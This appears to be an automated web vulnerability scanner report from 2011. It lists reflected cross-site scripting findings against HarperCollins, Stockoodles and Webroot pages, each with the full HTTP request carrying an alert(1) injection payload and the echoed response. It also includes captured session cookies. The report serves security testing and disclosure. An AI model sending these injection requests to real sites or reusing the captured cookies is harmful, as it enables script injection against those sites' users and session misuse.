GET /widgets/subscription/js/widget.aspx?sid=2&pt=nlf1c69%0aalert(1)//6c8b0e2d7df&pv=n42&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:14 GMT
Content-Length: 38434


document.write("<font class=\"fontGlobal2nlf1c69
alert(1)//6c8b0e2d7dfn42default\"><div id=\"divHCWidgetHead2nlf1c69
alert(1)//6c8b0e2d7dfn42default\"></div>");
document.write("<div
...[SNIP]...
42default = "Sign me up to receive news about books that explore biography, memoir, history, politics and more.";
var strProgramText2nlf1c69
alert(1)//6c8b0e2d7dfn42default = GetProgramText2nlf1c69
alert(1)//6c8b0e2d7df
n42default("Notable Nonfiction", "nl");
var strProgramType2nlf1c69
alert(1)//6c8b0e2d7dfn42default = GetProgramType2nlf1c69
alert(1)//6c8b0e2d7dfn42default("nl");
var iCurrentState2nl
...[SNIP]...

1.119. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8a6"%3balert(1)//38558cd33d2 was submitted in the pt parameter. This input was echoed as 1f8a6";alert(1)//38558cd33d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=nl1f8a6"%3balert(1)//38558cd33d2&pv=n42&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; fsr.a=1315416306405; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:08 GMT
Content-Length: 38735


document.write("<font class=\"fontGlobal2nl1f8a6";alert(1)//38558cd33d2n42default\"><div id=\"divHCWidgetHead2nl1f8a6";alert(1)//38558cd33d2n42default\"></div>");
document.write("<d
...[SNIP]...

1.120. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript rest-of-line comment. The payload 69597%0aalert(1)//11e60e246fb was submitted in the pv parameter. This input was echoed as 69597
alert(1)//11e60e246fb
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=at&pv=3282869597%0aalert(1)//11e60e246fb&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; hcxdom=53419521923642606000.1315416308173; __utma=74115853.1584798219.1315416308.1315416308.1315416308.1; __utmb=74115853.1.10.1315416308; __utmc=74115853; __utmz=74115853.1315416308.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1146650/WSJBOOKS_ProtectingYourParentsMoney_336x280.swf; hcid=b6dc398c-050e-4971-afa8-f2d77d9d5a56; sid=d404b5c3-2f66-4181-9efa-508be69e0d6b; fsr.a=1315416311225

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:49 GMT
Content-Length: 39108


document.write("<font class=\"fontGlobal2at3282869597
alert(1)//11e60e246fbdefault\"><div id=\"divHCWidgetHead2at3282869597
alert(1)//11e60e246fbdefault\"></div>");
document.write("
...[SNIP]...
Id2at3282869597
alert(1)//11e60e246fbdefault = 2;
var ProgramType2at3282869597
alert(1)//11e60e246fbdefault = "at";
var ProgramValue2at3282869597
alert(1)//11e60e246fbdefault = "3282869597
alert(1)//11e60e246fb
";
var DesignName2at3282869597
alert(1)//11e60e246fbdefault = "default";
var isCoppa2at3282869597
alert(1)//11e60e246fbdefault = true;
var iCoppaMode2at3282869597
alert(1)//1
...[SNIP]...

1.121. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 49a73%3balert(1)//ca8a8f2ac10 was submitted in the pv parameter. This input was echoed as 49a73;alert(1)//ca8a8f2ac10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=at&pv=3282849a73%3balert(1)//ca8a8f2ac10&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; hcxdom=53419521923642606000.1315416308173; __utma=74115853.1584798219.1315416308.1315416308.1315416308.1; __utmb=74115853.1.10.1315416308; __utmc=74115853; __utmz=74115853.1315416308.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1146650/WSJBOOKS_ProtectingYourParentsMoney_336x280.swf; hcid=b6dc398c-050e-4971-afa8-f2d77d9d5a56; sid=d404b5c3-2f66-4181-9efa-508be69e0d6b; fsr.a=1315416311225

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:46 GMT
Content-Length: 39108


document.write("<font class=\"fontGlobal2at3282849a73;alert(1)//ca8a8f2ac10default\"><div id=\"divHCWidgetHead2at3282849a73;alert(1)//ca8a8f2ac10default\"></div>");
document.write("
...[SNIP]...
3282849a73;alert(1)//ca8a8f2ac10default", "http://services.harpercollins.com/widgets/subscription/images/submit_dark.png", true);

//Widget variable declarations
var WidgetId2at3282849a73;alert(1)//ca8a8f2ac10default = 69;
var SiteId2at3282849a73;alert(1)//ca8a8f2ac10default = 2;
var ProgramType2at3282849a73;alert(1)//ca8a8f2ac10default = "at";
var ProgramValue2at3282849a73;alert(
...[SNIP]...

1.122. http://services.harpercollins.com/widgets/subscription/js/widget.aspx [pv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.harpercollins.com
Path:   /widgets/subscription/js/widget.aspx

Issue detail

The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f251e"%3balert(1)//83887f6d667 was submitted in the pv parameter. This input was echoed as f251e";alert(1)//83887f6d667 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/subscription/js/widget.aspx?sid=2&pt=at&pv=32828f251e"%3balert(1)//83887f6d667&dn=default&mid=&parentLoc=http%3A//www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke%3Fisbn%3D9780061358203%26HCHP%3DTB_Protecting+Your+Parents++Money HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-173804716-1315416306399; mmpa.tst=0.005; mmcore.tst=0.715; mmcore.mmact=; mmcore.srv=cg1.usw; mmcore.pd=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; mmid=-1209690185%7CAgAAAAp5tUI7rgYAAA%3D%3D; hcxdom=53419521923642606000.1315416308173; __utma=74115853.1584798219.1315416308.1315416308.1315416308.1; __utmb=74115853.1.10.1315416308; __utmc=74115853; __utmz=74115853.1315416308.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1146650/WSJBOOKS_ProtectingYourParentsMoney_336x280.swf; hcid=b6dc398c-050e-4971-afa8-f2d77d9d5a56; sid=d404b5c3-2f66-4181-9efa-508be69e0d6b; fsr.a=1315416311225

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Machine: SBKHCPWEBP01
Date: Wed, 07 Sep 2011 12:25:44 GMT
Content-Length: 39411


document.write("<font class=\"fontGlobal2at32828f251e";alert(1)//83887f6d667default\"><div id=\"divHCWidgetHead2at32828f251e";alert(1)//83887f6d667default\"></div>");
document.write
...[SNIP]...

1.123. http://stockoodles.com/v1/market/amfphp/gateway.php [2nd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stockoodles.com
Path:   /v1/market/amfphp/gateway.php

Issue detail

The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 8850a<script>alert(1)</script>4dcd5ba057e was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /v1/market/amfphp/gateway.php HTTP/1.1
Host: stockoodles.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
Content-Length: 244
Origin: http://stockoodles.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-koeijojj=04C6E63C1904F2207C2BA8B6E253ECB9; __qca=P0-1684316740-1315416745929

........null../1.....    ..
..Mflex.messaging.messages.CommandMessage.timestamp.headers.operation    body.correlationId.messageId.timeToLive.clientId.destination.........
#.%DSMessagingVersion    DSId....nil..
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store
Content-Type: application/x-amf
Date: Wed, 07 Sep 2011 12:32:50 GMT
Expires: Wed, 7 Sep 2011 07:32:50 GMT
Pragma: no-store
Connection: Keep-Alive
Content-Length: 393

......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../1/onResult..null...+.
.Uflex.messaging.messages.AcknowledgeMessage.messageId.I3724870C-0CFD-2E48-533F-0000359F3190.clientId.I7
...[SNIP]...
<....headers
....correlationId...2B8DEDAA-17C8-506A-1AEE-44F2D3FE8A9B8850a<script>alert(1)</script>4dcd5ba057e.

1.124. http://stockoodles.com/v1/market/amfphp/gateway.php [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stockoodles.com
Path:   /v1/market/amfphp/gateway.php

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 58f06<script>alert(1)</script>98b93e06103 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /v1/market/amfphp/gateway.php HTTP/1.1
Host: stockoodles.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
Content-Length: 277
Origin: http://stockoodles.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-koeijojj=04C6E63C1904F2207C2BA8B6E253ECB9; __qca=P0-1684316740-1315416745929; PHPSESSID=gio9fstslhuds6gf6pfqns7ie1

........null../2.....    ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation    bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store
Content-Type: application/x-amf
Date: Wed, 07 Sep 2011 12:33:02 GMT
Expires: Wed, 7 Sep 2011 07:33:02 GMT
Pragma: no-store
Connection: Keep-Alive
Content-Length: 599

......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../2/onStatus..null.....
.Iflex.messaging.messages.ErrorMessage.correlationId.I61A9427B-C408-65D3-7F57-44F2D2FA737D.faultCode.5AM
...[SNIP]...
/v1/market/amfphp/core/shared/app/BasicActions.php on line 25.faultString..AThe classpath folder {/mnt/stor10-wc2-dfw1/577993/www.stockoodles.com/web/content/v1/market/amfphp/services/BasicUtilsService58f06<script>alert(1)</script>98b93e06103.php} does not exist. You probably misplaced your service..

1.125. http://stockoodles.com/v1/market/amfphp/gateway.php [4th AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stockoodles.com
Path:   /v1/market/amfphp/gateway.php

Issue detail

The value of the 4th AMF string parameter is copied into the HTML document as plain text between tags. The payload c8ab3<script>alert(1)</script>ed4afefc687 was submitted in the 4th AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /v1/market/amfphp/gateway.php HTTP/1.1
Host: stockoodles.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
Content-Length: 277
Origin: http://stockoodles.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-koeijojj=04C6E63C1904F2207C2BA8B6E253ECB9; __qca=P0-1684316740-1315416745929; PHPSESSID=gio9fstslhuds6gf6pfqns7ie1

........null../2.....    ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation    bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store
Content-Type: application/x-amf
Date: Wed, 07 Sep 2011 12:33:05 GMT
Expires: Wed, 7 Sep 2011 07:33:05 GMT
Pragma: no-store
Connection: Keep-Alive
Content-Length: 420

......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../2/onResult..null...F.
.Uflex.messaging.messages.AcknowledgeMessage.messageId.I57941307-BCC9-8AA8-03E1-0000578D6A4F.clientId.I28D3B466-E8AF-C069-D271-000048B2D7DA.destination.    body.5gio9fstslhuds6gf6pfqns7ie1.timeToLive...timestamp.B>.cBd...headers
....correlationId...61A9427B-C408-65D3-7F57-44F2D2FA737Dc8ab3<script>alert(1)</script>ed4afefc687.

1.126. http://support.webroot.com/ci/redirect/enduser/enduser/acct_login.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.webroot.com
Path:   /ci/redirect/enduser/enduser/acct_login.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f29a7<script>alert(1)</script>178e29b8bea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ci/redirect/enduserf29a7<script>alert(1)</script>178e29b8bea/enduser/acct_login.php?p_sid=shNEGuDk HTTP/1.1
Host: support.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op670worryfreegum=a00501e0042797q07l2qj8fbc; op670worryfreeliid=a00501e0042797q07l2qj8fbc; s_vnum=1318008426626%26vn%3D1; s_vi=[CS]v1|2733B1860501303E-60000113001F5CD6[CE]; v39=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; pageName=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; IS3_GSV=DPL-2_TES-1315417966_PCT-1315417966_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1314429892-2-89_4-2-+3--2__4-3_4-3; __utma=43535610.1371063031.1315416427.1315416427.1315416427.1; __utmb=43535610.5.10.1315416427; __utmc=43535610; __utmz=43535610.1315416427.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; mbox=session#1315416421019-244022#1315419962|PC#1315416421019-244022.19#1331229302|check#true#1315418162; cp_session=aUBPqe9ex_RwrreoW72q1%7E9AMDARLWu9zbtsVr7pCBPxxD5ab3V0slezCoLOw052%7EmWPNc9rCDyOkP3CuQ%7Ees5jKBr2kRKs6EyOHKSzT5nRTvn6yr26qXu0tMKZL1uczgPBF88B1Ielnm0Dhi1S9Jgrsw1VYHK0BrD; s_nr=1315418110011; s_lv=1315418110013; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:57:23 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU3LlSQbVPBnJc%7E7ZfpCiJWpNGC3u8jkjZ7gr8OVcMPNlJPXEYUJdGt6uiM4Vymz_3AXDp8TuYz7mS4jeO1qVp1912CON2_b13AvH8rnNorHq1Oi_HjkTfFKJY4qcpR2u7QZBMxyINNi%7EAlgydl3M9i9dg7doyyaD7Tp2ry0iDXDhAdKxg8bpckw4IT2m5uavGRXaWH_%7Ewjk0%21; path=/; httponly
RNT-Time: D=113219 t=1315400243095244
RNT-Machine: 04
Vary: Accept-Encoding
Content-Length: 18151
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
<p>Page /ci/redirect/enduserf29a7<script>alert(1)</script>178e29b8bea/enduser/acct_login.php?p_sid=shNEGuDk not found.</p>
...[SNIP]...

1.127. http://support.webroot.com/ci/redirect/enduser/enduser/ask.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.webroot.com
Path:   /ci/redirect/enduser/enduser/ask.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d35f0<script>alert(1)</script>ba7454ce186 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ci/redirect/enduserd35f0<script>alert(1)</script>ba7454ce186/enduser/ask.php?p_sid=bw7EGuDk HTTP/1.1
Host: support.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op670worryfreegum=a00501e0042797q07l2qj8fbc; op670worryfreeliid=a00501e0042797q07l2qj8fbc; s_vnum=1318008426626%26vn%3D1; s_vi=[CS]v1|2733B1860501303E-60000113001F5CD6[CE]; v39=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; pageName=En_US%20%7C%20Business%20%7C%20Landing%20%7C%20Index; IS3_GSV=DPL-2_TES-1315417966_PCT-1315417966_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1314429892-2-89_4-2-+3--2__4-3_4-3; s_nr=1315418096331; s_lv=1315418096335; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; __utma=43535610.1371063031.1315416427.1315416427.1315416427.1; __utmb=43535610.5.10.1315416427; __utmc=43535610; __utmz=43535610.1315416427.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; s_sq=webrootglobalprod%2Cwebrootprod%3D%2526pid%253DEn_US%252520%25257C%252520Unassigned%252520%25257C%252520Search%252520results%252520%25257C%252520Search-results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fsupport.webroot.com%25252F%2526ot%253DA; cp_session=aU6KnGJ1JsmocTdJJ9D4NT%7Eax32PQonvKOjBTtCbDqRsxsWp%7Eyja6yVSIpzLXGR3f3Td9wg9q4XWcr3R1qv_FC2i3e3TTwK90I3zqHDbMHnrKtQeVbd2mGcGmx0Mpmd6%7Ecn16wsQWH%7Egq_kVVQfuSIn_8dfY1C2dF7; mbox=session#1315416421019-244022#1315419962|PC#1315416421019-244022.19#1331229302|check#true#1315418162

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:58:18 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUzowsmOqRvl7bf_Ciby9BcENyvvKQkxpn2jwytWqIUAjaHynGEd8t04KrTo8CtaWkwMe%7En%7E4p3FldeYkijf2Jeqk8DLBdVvaip4sGZaug04FY8qf5zcSaNRTp9MfoIP2DRYxAIqHAveNr0P8YA54UdM3BuUUzIrOEx3vLDJIHKBG3LuMQ7uunCastKzowa%7EYbHKUUZ5ALQlEQvUqnKEuCX2kDe4a3qbt8J60W4LaQ8OgzncXUVZ6Cl57mfZlg1936uo213vRvx7UGho2BP1w3Zo2rp%7E0XbukR6nUQ6slryDfxJBNh__YdRnnYtW7sYcVvcDhBagvm9FZWIVFr4K0jArEZjdA5j_diKGWJ5F26puX_OxzSYuZ%7EBw%21%21; path=/; httponly
RNT-Time: D=106460 t=1315400298321215
RNT-Machine: 01
Vary: Accept-Encoding
Content-Length: 18144
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
<p>Page /ci/redirect/enduserd35f0<script>alert(1)</script>ba7454ce186/enduser/ask.php?p_sid=bw7EGuDk not found.</p>
...[SNIP]...

1.128. http://updates.webroot.com/autorenewal/auto_renewal_optout.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://updates.webroot.com
Path:   /autorenewal/auto_renewal_optout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41245"><script>alert(1)</script>426159b056e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autorenewal/auto_renewal_optout.php/41245"><script>alert(1)</script>426159b056e HTTP/1.1
Host: updates.webroot.com
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
